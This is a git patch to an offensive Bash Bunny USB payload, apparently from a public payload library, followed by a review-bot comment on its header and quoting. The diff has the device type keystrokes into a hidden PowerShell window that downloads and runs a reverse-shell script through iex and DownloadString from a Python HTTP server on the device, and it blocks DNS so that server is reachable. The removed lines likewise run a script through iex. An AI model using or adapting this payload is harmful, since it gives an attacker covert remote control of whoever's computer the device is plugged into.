From a991cd7af49ba339c1ee813e9fc26306c7902733 Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Wed, 19 Oct 2022 18:26:40 +0200
Subject: [PATCH] Update payload.txt

---
 .../remote_access/PingZhellBunny/payload.txt | 45 ++++++++++---------
 1 file changed, 25 insertions(+), 20 deletions(-)

diff --git a/payloads/library/remote_access/PingZhellBunny/payload.txt b/payloads/library/remote_access/PingZhellBunny/payload.txt
index 2b62fa78..b21d67b2 100644
--- a/payloads/library/remote_access/PingZhellBunny/payload.txt
+++ b/payloads/library/remote_access/PingZhellBunny/payload.txt
@@ -1,39 +1,44 @@
 #!/bin/bash
 #
-# Title: PingZhellBunny
-# Description: Get remote access using a icmp reverse shell.
+# Title: ReverseBunnySSL
+# Description: Get remote access, using an obfuscated powershell reverse shell.
 # Author: 0iphor13
-# Version: 1.3
+# Version: 1.5
 # Category: Remote_Access
-# Attackmodes: HID, Storage
+# Attackmodes: HID, RNDIS_ETHERNET
 LED SETUP
-
-Q DELAY 500
+ATTACKMODE RNDIS_ETHERNET HID
 GET SWITCH_POSITION
-DUCKY_LANG de
+GET HOST_IP
 
-Q DELAY 500
+cd /root/udisk/payloads/$SWITCH_POSITION/
 
-ATTACKMODE HID STORAGE
+# starting server
+LED SPECIAL
 
-#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+# disallow outgoing dns requests so the server is accessible immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
 
-LED STAGE1
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
 
-#After you have adapted the delays for your target, add "-W hidden"
+#Opens hidden powershell instance
 Q DELAY 1500
-RUN WIN "powershell -Exec Bypass -NoP -NonI"
+Q GUI r
+Q DELAY 500
+Q STRING "powershell -NoP -NonI -w h"
 Q DELAY 500
 Q ENTER
-Q DELAY 1000
-Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')"
-Q DELAY 3000
+Q DELAY 500
+
+#Insert attacking IP
+Q STRING "\$IP = '0.0.0.0';"
+Q DELAY 250
+Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/PingZhellBunny.ps1\")"
+Q DELAY 400
 Q ENTER
-Q DELAY 1000
-
-ATTACKMODE HID
-
 LED FINISH
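Review bot: The header block at the top of the hunk no longer matches the code below it: `# Title: ReverseBunnySSL` while the payload directory in the patch path and the file fetched via `DownloadString(\"http://$HOST_IP/PingZhellBunny.ps1\")` still say `PingZhellBunny`, and the new description speaks of an obfuscated shell although nothing in this file shows what that refers to. The header also omits the two things the file depends on but does not itself carry: `PingZhellBunny.ps1` has to exist in the directory served by `python -m SimpleHTTPServer 80`, and the `0.0.0.0` value under `#Insert attacking IP` is a placeholder the file never fills in. I would add a header line such as `# Requires: PingZhellBunny.ps1 in this payload directory; the 0.0.0.0 placeholder below is not set by this file` and keep the Title consistent with the directory name. Separately, `cd /root/udisk/payloads/$SWITCH_POSITION/` is unquoted and unchecked; `cd "/root/udisk/payloads/$SWITCH_POSITION/" || exit 1` would stop the script instead of letting the backgrounded HTTP server export whatever directory the shell happens to be in.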